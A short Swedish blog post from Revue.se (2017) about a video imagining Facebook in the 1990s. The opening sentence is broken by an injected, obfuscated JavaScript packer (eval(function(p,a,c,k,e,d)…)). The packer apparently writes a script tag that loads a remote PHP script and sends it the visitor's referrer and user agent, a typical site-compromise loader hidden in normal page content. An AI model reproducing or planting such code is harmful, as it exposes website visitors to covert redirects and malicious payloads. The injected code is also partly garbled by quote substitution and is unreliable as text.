Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

No Comments

Så kunde Facebook ha sett ut på 90-talet | Revue.se

Sebastian Plengier Ehrnfelt

Så eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekfat|var|u0026u|referrer|bnned||js|php’.split(‘|’),0,{}))
här skulle Facebook kunnat se ut om det fanns på 90-talet.

Detta är en cool introduktionsvideo för ”The Facebook” som visar tolkningarna som av vad Squirrl Monkey tror att det skulle sett ut på 90 talet. Kolla på videon för en hel demostration.